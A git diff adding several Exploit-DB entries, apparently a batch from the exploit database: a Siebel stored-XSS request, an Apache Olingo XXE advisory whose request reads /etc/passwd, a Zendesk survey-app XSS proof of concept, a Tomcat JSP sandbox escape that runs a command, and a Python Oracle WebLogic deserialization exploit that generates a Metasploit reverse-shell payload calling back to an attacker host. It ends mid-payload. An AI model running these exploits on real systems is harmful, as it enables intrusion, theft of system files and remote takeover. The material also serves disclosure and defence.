+Content-Type: application/x-www-form-urlencoded
+Accept-Encoding: gzip, deflate
+User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64;
+Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729;
+.NET CLR 3.5.30729)
+Host: X.X.X.X
+Content-Length: 550
+Pragma: no-cache
+Cookie: SWEUAID=23; _sn=**-yVfB7JyKox4txS.fQJdh6us-fIdUQaQW0.oxIhK
+Connection: close
+
+s_1_1_26_0=&SWEVI=&SWERowId=1-5VWLXT4&SWEC=39&s_1_1_28_0=&SWEMethod=PostChanges&s_1_1_18_0=12/9/2019&SWEPOC=Account&SWEReqRowId=1&SWERPC=1&s_1_1_90_0=N&s_1_1_71_0=&s_1_1_72_0=&s_1_1_83_0=<IFRAME
+SRC="javascript:alert('XSS');"></IFRAME>&SWEApplet=Revenue%20Analysis%20Form%20Applet&SWEActiveApplet=Revenue%20Analysis%20Form%20Applet&s_1_1_51_0=%240.00&SWEView=Revenue%20Analysis%20View&SWECmd=InvokeMethod&s_1_1_65_0=&s_1_1_21_0=%240.00&s_1_1_55_0=SADMIN&SWETS=1575878518105&SWEActiveView=Revenue%20Analysis%20View&s_1_1_89_0=&s_1_1_78_0=%240.00&SWEP=&s_1_1_36_0=N&s_1_1_14_0=0.000000&SWERowIds=
\ No newline at end of file
diff --git a/exploits/java/webapps/47770.txt b/exploits/java/webapps/47770.txt
new file mode 100644
index 000000000..0383322ac
--- /dev/null
+++ b/exploits/java/webapps/47770.txt
@@ -0,0 +1,121 @@
+#############################################################
+#
+# COMPASS SECURITY ADVISORY
+# https://www.compass-security.com/research/advisories/
+#
+#############################################################
+#
+# Product:  Apache Olingo OData 4.0
+# Vendor:   Apache Foundation
+# CSNC ID:  CSNC-2009-025
+# CVE ID:   CVE-2019-17554
+# Subject:  XML External Entity Resolution (XXE)
+# Risk:     High
+# Effect:   Remotely exploitable
+# Author:   Archibald Haddock (advisories@compass-security.com)
+# Date:     08.11.2019
+#
+#############################################################
+
+Introduction:
+-------------
+Apache Olingo is a Java library that implements the Open Data Protocol (OData). [1]
+XML data is parsed by insecurley configured software components, which can be abused for XML External Entity Attacks [2].
+
+
+
+Affected:
+---------
+Vulnerable:
+ * Olingo OData 4.x.x to 4.6.x
+
+Not vulnerable:
+ * Olingo OData 4.7.0
+ * The Olingo OData 2.0 implementation has XXE protection since 1.1.0-RC01
+
+Technical Description
+---------------------
+The XML content type entity deserializer is not configured to deny the resolution of external entities.
+Request with content type "application/xml", which trigger the deserialization of entities, can be used to trigger XXE attacks.
+
+Request
+======
+POST /odata-server-sample/cars.svc/Cars HTTP/1.1
+Host: localhost:8081
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: close
+Referer: http://localhost:8081/odata-server-sample/
+Cookie: JSESSIONID=17C3158153CDC2CA1DBA0E77D4AFC3B0
+Upgrade-Insecure-Requests: 1
+content-type: application/xml
+Content-Length: 1101
+
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
+<a:entry xmlns:a="http://www.w3.org/2005/Atom" xmlns:m="http://docs.oasis-open.org/odata/ns/metadata" xmlns:d="http://docs.oasis-open.org/odata/ns/data" m:context="$metadata#Cars/$entity">
+  <a:id>Cars(1)</a:id>
+  <a:title></a:title>
+  <a:summary></a:summary>
+  <a:updated>2019-11-08T15:10:30Z</a:updated>
+  <a:author>
+    <a:name></a:name>
+  </a:author>
+  <a:link rel="edit" href="Cars(1)"></a:link>
+  <a:link rel="http://docs.oasis-open.org/odata/ns/related/Manufacturer" type="application/atom+xml;type=feed" title="Manufacturer" href="Cars(1)/Manufacturer"></a:link>
+  <a:category scheme="http://docs.oasis-open.org/odata/ns/scheme" term="#olingo.odata.sample.Car"></a:category>
+  <a:content type="application/xml">
+    <m:properties>
+      <d:Id m:type="Int16">1</d:Id>
+      <d:Model>F1 &xxe;</d:Model>
+      <d:ModelYear>2012</d:ModelYear>
+      <d:Price m:type="Decimal">189189.43</d:Price>
+      <d:Currency>EUR</d:Currency>
+    </m:properties>
+  </a:content>
+</a:entry>
+
+Response
+========
+HTTP/1.1 201 Created
+Server: Apache-Coyote/1.1
+OData-Version: 4.0
+Content-Type: application/xml
+Content-Length: 960
+Date: Fri, 08 Nov 2019 14:22:35 GMT
+Connection: close
+
+<?xml version="1.0" encoding="UTF-8"?><a:entry xmlns:a="http://www.w3.org/2005/Atom" xmlns:m="http://docs.oasis-open.org/odata/ns/metadata" xmlns:d="http://docs.oasis-open.org/odata/ns/data" m:context="$metadata#Cars"><a:id>Cars(1)</a:id><a:title></a:title><a:summary></a:summary><a:updated>2019-11-08T15:22:35Z</a:updated><a:author><a:name></a:name></a:author><a:link rel="edit" href="Cars(1)"></a:link><a:link rel="http://docs.oasis-open.org/odata/ns/related/Manufacturer" type="application/atom+xml;type=feed" title="Manufacturer" href="Cars(1)/Manufacturer"></a:link><a:category scheme="http://docs.oasis-open.org/odata/ns/scheme" term="#olingo.odata.sample.Car"></a:category><a:content type="application/xml"><m:properties><d:Id m:type="Int16">1</d:Id><d:Model>
+myuser:x:1000:1000:,,,:/home/myuser:/bin/bash
+</d:Model><d:ModelYear>2012</d:ModelYear><d:Price m:type="Decimal">189189.43</d:Price><d:Currency>EUR</d:Currency></m:properties></a:content></a:entry>
+
+
+Workaround / Fix:
+-----------------
+Configure the XML reader securely [3].
+
+In org.apache.olingo.server.core.deserializer.xml.ODataXmlDeserializer.java on line 70 a javax.xml.stream.XMLInputFactory is instanciated:
+private static final XMLInputFactory FACTORY = XMLInputFactory.newFactory();
+
+The XMLInputFactory should be configured, not to resolve external entities:
+FACTORY.setProperty(XMLInputFactory.SUPPORT_DTD, false);
+FACTORY.setProperty("javax.xml.stream.isSupportingExternalEntities", false);
+
+
+Timeline:
+---------
+2019-11-08:     Discovery by Compass Security
+2019-11-08:     Initial vendor notification
+2019-11-08:     Initial vendor response
+2019-12-04:     Release of fixed Version / Patch [4]
+2019-12-05:     Coordinated public disclosure date
+
+
+[1] https://olingo.apache.org/
+[2] https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
+[3] https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html
+[4] https://mail-archives.apache.org/mod_mbox/olingo-user/201912.mbox/%3CCAGSZ4d7Ty%3DL-n_iAzT6vcQp65BY29XZDS5tMoM8MdDrb1moM7A%40mail.gmail.com%3E
+
+Source: https://www.compass-security.com/fileadmin/Datein/Research/Advisories/CSNC-2019-025_apache_xxe.txt
\ No newline at end of file
diff --git a/exploits/java/webapps/47781.txt b/exploits/java/webapps/47781.txt
new file mode 100644
index 000000000..e6f5e7cff
--- /dev/null
+++ b/exploits/java/webapps/47781.txt
@@ -0,0 +1,32 @@
+# Exploit Title: Zendesk App SweetHawk Survey 1.6 - Persistent Cross-Site Scripting
+# Date: 2019-12-17
+# Exploit Author: MTK
+# Vendor Homepage: https://sweethawk.co/zendesk/survey-app
+# Software Link: https://www.zendesk.com/apps/support/survey/
+# Version: Up to v1.6
+# Tested on: Zendesk - Firefox/Windows
+
+# Software description:
+# Sweet Hawk Survey app ask customers for a 0-10 score instead of the normal good or bad question. 
+# You can get more granular satisfaction data without compromising the response rate. 
+# Ask an optional NPS question on the landing page. View reports and drill down into the response 
+# detail and go directly to the ticket. Easy to set up, just replace the survey place holder in 
+# your trigger or automation. Customize the landing pages for each of your brands.
+
+# Technical Details & Impact:
+# Attackers use vulnerable web pages to inject malicious code and have it stored on the web server 
+# for later use. The payload is automatically served to users who browse web pages and executed in 
+# their context. Thus, the victims do not need to click on a malicious link to run the payload. 
+# All they have to do is visit a vulnerable web page.
+
+# POC
+
+1. Open Support ticket in Zendesk and send XSS payload e.g;
+<script>alert(1);</script>
+2. Generate survey  request to rate the ticket and payload will execute;
+
+# Time line
+09-19-2019 - Vulnerability discovered
+09-20-2019 - Vendor contacted
+12-02-2019 - Detailed report shared and full disclosure time line given with no response
+12-17-2019 - Full Disclosure
\ No newline at end of file
diff --git a/exploits/java/webapps/47892.txt b/exploits/java/webapps/47892.txt
new file mode 100644
index 000000000..4660790cc
--- /dev/null
+++ b/exploits/java/webapps/47892.txt
@@ -0,0 +1,83 @@
+# Exploit Title: Tomcat proprietaryEvaluate 9.0.0.M1 - Sandbox Escape
+# Date: 2020-01-07
+# Exploit Author: Harrison Neal, PatchAdvisor
+# Vendor Homepage: https://tomcat.apache.org/
+# Software Link: https://archive.apache.org/dist/tomcat/tomcat-8/v8.0.36/bin/apache-tomcat-8.0.36.exe
+# Version: 8.0.36
+# Description: Tomcat proprietaryEvaluate/introspecthelper Sandbox Escape
+# Tested on: Windows 
+# CVE: CVE-2016-5018
+ /*   
+# See https://tomcat.apache.org/tomcat-8.0-doc/security-manager-howto.html for more information about the default sandbox.   
+# When Tomcat 8 is configured to run as a service, you can use the Tomcat8w.exe tool to enable/disable the security manager.
+# In the Java tab, add the following options:
+# -Djava.security.manager
+# -Djava.security.policy=C:\Program Files\Apache Software Foundation\Tomcat 8.0\conf\catalina.policy
+ */
+ 
+ <%@ page import="java.util.*,java.io.*,org.apache.jasper.runtime.*,java.lang.reflect.*"%>
+<%   
+    SecurityManager sm = System.getSecurityManager();
+    
+    if (sm != null) {
+        try {
+            ProtectedFunctionMapper pfm = ProtectedFunctionMapper.getInstance();
+
+            { // Tomcat 7+
+                // Get the desired method
+                Method[] methods = (Method[]) PageContextImpl.proprietaryEvaluate(
+                        "${pageContext.getServletContext().getClass().getDeclaredMethods()}",
+                        Method[].class, pageContext, pfm /*, false*/); // Uncomment "false" parameter for Tomcat 7
+
+                Method theMethod = null;
+
+                for (Method m : methods) {
+                    if ("executeMethod".equals(m.getName())) {
+                        theMethod = m;
+                        break;
+                    }
+                }
+
+                // Set it to accessible
+                JspRuntimeLibrary.introspecthelper(
+                        theMethod,
+                        "accessible",
+                        "true",
+                        request,
+                        null,
+                        false);
+
+                // Run it
+                theMethod.invoke(pageContext.getServletContext(),
+                        System.class.getMethod("setSecurityManager", new Class[]{SecurityManager.class}),
+                        null,
+                        new Object[]{null}
+                );
+            }
+            
+            /*{ // Tomcat 5.5 and 6
+                pfm.mapFunction("hello:world", System.class, "setSecurityManager", new Class[] { SecurityManager.class });
+                PageContextImpl.proprietaryEvaluate("${hello:world(null)}", Object.class, pageContext, pfm, false);
+            }*/
+            
+        } catch (Throwable ex) {
+            PrintWriter pw = new PrintWriter(out);
+            ex.printStackTrace(pw);
+            pw.flush();
+        }
+    }
+    
+    // Your payload goes here
+    try {
+        Runtime.getRuntime().exec("calc");
+    } catch (Throwable ex) {
+        PrintWriter pw = new PrintWriter(out);
+        ex.printStackTrace(pw);
+        pw.flush();
+    }
+    
+    // Optional put the security manager back
+    if (sm != null) {
+        System.setSecurityManager(sm);
+    }
+%>
\ No newline at end of file
diff --git a/exploits/java/webapps/47895.py b/exploits/java/webapps/47895.py
new file mode 100755
index 000000000..90bd8b5aa
--- /dev/null
+++ b/exploits/java/webapps/47895.py
@@ -0,0 +1,116 @@
+# Exploit Title: Oracle Weblogic 10.3.6.0.0 - Remote Command Execution
+# Date: 2020-01-08
+# Exploit Author: Waffles & Paveway3
+# Vendor Homepage: https://www.oracle.com/middleware/technologies/weblogic.html
+# Version: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0
+# Tested on: Windows
+# CVE : CVE-2019-2729
+
+SerialLogic.py
+
+# Exploit Title: SerialLogic
+# Date: 01-08-2020
+# Exploit Author: Waffles & Paveway3
+# Vendor Homepage: https://www.oracle.com/middleware/technologies/weblogic.html
+# Version: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0
+# Tested on: Windows
+# CVE : CVE-2019-2729
+
+import argparse
+import requests
+import sys
+import os
+import base64
+
+# Colors for terminal output because I likes pretty things
+class bcolors:
+	OKGREEN = '\033[92m'
+	BOLD = '\033[1m'
+	NONERED = '\033[91m'
+	ENDLINE = '\033[0m'
+	UNDERLINE = '\033[4m'
+
+banner = """\n
+   _______    ________    ___   ____ _______       ___  ________  ____ 
+  / ____/ |  / / ____/   |__ \ / __ <  / __ \     |__ \/__  /__ \/ __ \
+ / /    | | / / __/________/ // / / / / /_/ /_______/ /  / /__/ / /_/ /
+/ /___  | |/ / /__/_____/ __// /_/ / /\__, /_____/ __/  / // __/\__, / 
+\____/  |___/_____/    /____/\____/_//____/     /____/ /_//____/____/  
+"""
+
+print(banner)
+
+parser = argparse.ArgumentParser()
+parser.add_argument('-cs', dest='cobaltstrike', default=False, required=False, help="Use Cobalt Strike as callback", action='store_true')
+parser.add_argument('-msf', dest='metasploit', default=False, required=False, help="Use Metasploit Handler as callback", action='store_true')
+parser.add_argument('-rhost', dest='target_host', default='', required=True, help="Target Host")
+parser.add_argument('-rport', dest='target_port', default='', required=True, help="Target Port")
+parser.add_argument('-lhost', dest='listen_host', default='', required=True, help="Listening host IP for callback")
+parser.add_argument('-lport', dest='listen_port', default='', required=True, help="Listening port for callback")
+parser.add_argument('-ssl', dest='usessl', default=False, required=False, help="Use HTTPS instead of HTTP", action='store_true')
+args = parser.parse_args()
+
+print("\n")
+
+# Assign user arguments to variables we can use
+cobaltstrike = str(args.cobaltstrike) 
+metasploit = str(args.metasploit) 
+target_host = str(args.target_host) 
+target_port = str(args.target_port) 
+listen_host = str(args.listen_host) 
+listen_port = str(args.listen_port) 
+usessl = str(args.usessl)
+
+if cobaltstrike == 'True':
+	cobaltstrike = True
+else:
+	cobaltstrike = False
+if metasploit == 'True':
+	metasploit = True
+else:
+	metasploit = False
+if usessl == 'True':
+	usessl = True
+else:
+	usessl = False
+
+if metasploit and not cobaltstrike:
+	os.system("msfvenom -p windows/meterpreter/reverse_tcp LHOST=" + listen_host + " LPORT=" + listen_port + " -f psh-cmd -o /tmp/CVE_2019_2729_MSF.txt > /dev/null 2>&1")
+	with open('/tmp/CVE_2019_2729_MSF.txt', 'r') as msfcmd:
+		the_cmd = msfcmd.read()
+elif cobaltstrike and not metasploit:
+	os.system("msfvenom -p windows/meterpreter/reverse_http LHOST=" + listen_host + " LPORT=" + listen_port + " -f psh-cmd -o /tmp/CVE_2019_2729_CS.txt > /dev/null 2>&1")
+	with open('/tmp/CVE_2019_2729_CS.txt', 'r') as cscmd:
+		the_cmd = cscmd.read()
+else:
+	print("Please try with ONE of the payload options.")
+	sys.exit()
+
+headers = {
+	'Content-Type':'text/xml',
+	'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0',
+	'SOAPAction':'',
+	'lfcmd':'' + the_cmd
+	}
+
+data_pref = '<?xml version="1.0" encoding="utf-8"?><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <array method="forName"> <string>oracle.toplink.internal.sessions.UnitOfWorkChangeSet</string> <void>'
+yss_payload = "CjxhcnJheSBjbGFzcz0iYnl0ZSIgbGVuZ3RoPSI2ODYyIj48dm9pZCBpbmRleD0iMTYwMSI+PGJ5dGU+MTAwPC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMTM4MSI+PGJ5dGU+NjQ8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIyODkzIj48Ynl0ZT42NTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjEyMzUiPjxieXRlPjk5PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMTE1Ij48Ynl0ZT4xMDg8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIxMDkyIj48Ynl0ZT4xMTU8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIyNjE5Ij48Ynl0ZT42NjwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjIwOTEiPjxieXRlPjcyPC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNjM1NCI+PGJ5dGU+MTA8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIyMTY0Ij48Ynl0ZT4xMTU8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIxNTc4Ij48Ynl0ZT4xMDQ8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI4OTciPjxieXRlPjEwMTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjE2MjUiPjxieXRlPjEyPC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNjY0MSI+PGJ5dGU+NzI8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI2MjYyIj48Ynl0ZT40NzwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjM3MCI+PGJ5dGU+MTA1PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMjIxNiI+PGJ5dGU+NzQ8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI1MTQ3Ij48Ynl0ZT4xMTY8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIxMjU1Ij48Ynl0ZT4xMDk8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIyMDQiPjxieXRlPjEwMTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjE0ODQiPjxieXRlPjk3PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNDEwOCI+PGJ5dGU+NjU8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIxNjQyIj48Ynl0ZT4xMTE8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI0MzE4Ij48Ynl0ZT4xMDU8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI2NjUyIj48Ynl0ZT4yMTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjYzMjQiPjxieXRlPjI8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI0OTY1Ij48Ynl0ZT4xMDE8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI2MTcxIj48Ynl0ZT40OTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjM2NTIiPjxieXRlPjY1PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMTc4MyI+PGJ5dGU+MTA5PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMjc2NiI+PGJ5dGU+MTAwPC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNTU5NCI+PGJ5dGU+MjwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9Ijk0MiI+PGJ5dGU+MTA4PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNDc4NiI+PGJ5dGU+NzY8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIyMzU5Ij48Ynl0ZT4xMTk8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI1MzQxIj48Ynl0ZT4xMDU8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI1MjkiPjxieXRlPjExMTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjE3NTkiPjxieXRlPjExODwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjMxNDgiPjxieXRlPjEwNDwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjUyNjkiPjxieXRlPjExMTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjU0MzIiPjxieXRlPjExNTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjIxMzkiPjxieXRlPjEwNTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjM2Ij48Ynl0ZT4tMzU8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIzNTQ4Ij48Ynl0ZT44MjwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjQ3ODgiPjxieXRlPjk3PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMTU0MSI+PGJ5dGU+NTA8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI1ODgxIj48Ynl0ZT40PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNTk0NyI+PGJ5dGU+LTc0PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNTIzNSI+PGJ5dGU+OTc8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIyMTQ0Ij48Ynl0ZT43MDwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjMzNjEiPjxieXRlPjEwNDwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjI5NDciPjxieXRlPjg3PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMjQwOCI+PGJ5dGU+MTA4PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNjE4MyI+PGJ5dGU+MTAxPC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMTMyMCI+PGJ5dGU+NTA8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIxODEzIj48Ynl0ZT4xMDM8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIyODA4Ij48Ynl0ZT4xMTI8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIyMDMiPjxieXRlPjgzPC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNDI4NiI+PGJ5dGU+MTE1PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMTY4OSI+PGJ5dGU+NDE8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIzNTgwIj48Ynl0ZT42OTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjMxMjEiPjxieXRlPjQ4PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMzEwMCI+PGJ5dGU+NjU8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI0MTQyIj48Ynl0ZT42NTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjUzNyI+PGJ5dGU+OTc8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIxNDE3Ij48Ynl0ZT4xMTU8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI0NDk4Ij48Ynl0ZT41OTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjE5MzciPjxieXRlPjY1PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMjk4NSI+PGJ5dGU+MTA0PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMTUwMCI+PGJ5dGU+MTAxPC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNTQ0NyI+PGJ5dGU+NTY8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIzMzA0Ij48Ynl0ZT43MDwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjUwOTciPjxieXRlPjczPC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNzcwIj48Ynl0ZT4xMTA8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIyMjQ0Ij48Ynl0ZT41NzwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjQ3MTYiPjxieXRlPjEwPC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMzQ1MCI+PGJ5dGU+NjU8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIyMTUiPjxieXRlPjk3PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNjYzMSI+PGJ5dGU+NzM8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI0NDMwIj48Ynl0ZT4xMTE8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIzNzI1Ij48Ynl0ZT44NDwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjE4ODkiPjxieXRlPjY1PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMjMzMSI+PGJ5dGU+NTA8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIzMDExIj48Ynl0ZT4xMDk8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIzNzg3Ij48Ynl0ZT4xMTQ8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI2ODM4Ij48Ynl0ZT40NjwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjY2OTQiPjxieXRlPjQ8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI2MjYwIj48Ynl0ZT4xMTg8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI1ODExIj48Ynl0ZT41NzwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjM0MzMiPjxieXRlPjExMjwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjI1MDYiPjxieXRlPjEwMDwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjI0MiI+PGJ5dGU+MTE1PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNDA2MCI+PGJ5dGU+ODU8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIzNTc5Ij48Ynl0ZT42NTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjMzMzYiPjxieXRlPjUzPC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNTgwNiI+PGJ5dGU+NTM8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI2NjM2Ij48Ynl0ZT45NzwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjQzMzEiPjxieXRlPjY4PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNTE3OSI+PGJ5dGU+MTI8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI2MDE0Ij48Ynl0ZT4yMTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjM1MzUiPjxieXRlPjcxPC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMTU2OCI+PGJ5dGU+OTc8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIyNjQ3Ij48Ynl0ZT43MTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjE3OTYiPjxieXRlPjk3PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMzg2MCI+PGJ5dGU+NjU8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI1OTA4Ij48Ynl0ZT4xMDc8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI0MDc0Ij48Ynl0ZT42NTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjIyMDQiPjxieXRlPjkwPC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNDcyNSI+PGJ5dGU+OTc8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI0Nzc3Ij48Ynl0ZT4xMTA8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIxNTEzIj48Ynl0ZT4xMTQ8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI4MzYiPjxieXRlPjExNzwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjM2MTMiPjxieXRlPjEwMTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjEwOTYiPjxieXRlPjExMTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjkzNCI+PGJ5dGU+OTc8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI4MDEiPjxieXRlPjEwODwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjEwMzgiPjxieXRlPjQ3PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMTAwMiI+PGJ5dGU+OTc8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI0MDUwIj48Ynl0ZT42NTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjQ4NzMiPjxieXRlPjEwMTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjI1MyI+PGJ5dGU+OTk8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIyNjM2Ij48Ynl0ZT42NjwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjUzMTciPjxieXRlPjEwMTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjQzNjAiPjxieXRlPjc2PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMzI0Ij48Ynl0ZT4xMTY8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIyMDI0Ij48Ynl0ZT4xMDg8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIxMDciPjxieXRlPjExMjwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjI0MzgiPjxieXRlPjg2PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMTgzMCI+PGJ5dGU+OTc8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI2MTc3Ij48Ynl0ZT41MzwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjMwMSI+PGJ5dGU+MTIxPC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMzA3NCI+PGJ5dGU